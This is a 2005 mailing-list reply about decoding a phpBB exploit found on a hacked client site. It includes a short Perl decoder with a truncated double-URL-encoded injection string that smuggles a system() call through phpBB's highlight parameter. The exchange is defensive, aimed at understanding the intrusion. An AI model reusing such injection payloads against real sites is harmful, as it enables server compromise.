Re: (OT) Understanding phpbb hack.
On Tue, 25 Jan 2005 19:16:14 +0800, Franki <franki@htmlfixit.com> wrote:
> A client of mine was hacked using a phpbb exploit.
> %2527%252esystem(chr(101)
> Does anyone know of a perl script or something that can convert this
> back to a string of human readable shell commands??
Its double URL encoded with a bunch of decimal chr commands, this
should get you started:
#!/usr/bin/perl
use strict;
use warnings;
my $string = "viewtopic.php?t=509&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)+%252echr(111)%252echr(32";
$string =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/eg; # Deurlencode
$string =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/eg; # Twice
$string =~ s/chr\((\d*)\)/chr($1)/eg; # Convert chr commands to their output
print $string , "\n";
--
David Dorward <http://dorward.me.uk><http://blog.dorward.me.uk>
Reply to: